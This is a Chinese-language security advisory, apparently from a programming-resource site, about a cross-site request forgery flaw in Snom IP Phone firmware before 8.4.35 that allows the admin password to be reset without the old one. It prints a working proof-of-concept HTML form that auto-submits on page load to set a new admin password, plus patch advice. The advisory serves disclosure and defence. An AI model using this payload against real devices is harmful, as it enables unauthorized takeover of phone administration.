发布日期:2012-02-23
更新日期:2012-02-24受影响系统:
Snom IP Phone < 8.4.35
描述:
--------------------------------------------------------------------------------
Snom是德国的一家VoIP电话厂商。snom IP Phone在实现上存在安全漏洞,管理员登录表格与重置管理密码表格相同,无需输入旧密码即可更改密码,导致跨站请求伪造,从而提升权限。<*来源:Nathaniel Carew
链接:http://packetstormsecurity.org/files/110115/Snop-IP-Phone-Privilege-Escalation.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Nathaniel Carew ()提供了如下测试方法:<?php echo htmlentities("<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action=" http://x.x.x.x/advanced_network.htm" name="form"
method="POST">
<input type="text" name="admin_mode" value="on">
<input type="text" name="admin_mode_password" value="newpass">
<input type="text" name="admin_mode_password_confirm" value="newpass">
<input type="text" name="Settings" value="save">
</form>
</body><br>
</html>"); ?>建议:
--------------------------------------------------------------------------------
厂商补丁:Snom
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.snom.de/libxml2哈希冲突拒绝服务漏洞snom VoIP Phone Firmware远程权限提升漏洞相关资讯 snom IP Phone 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您
|
易网时代-编程资源站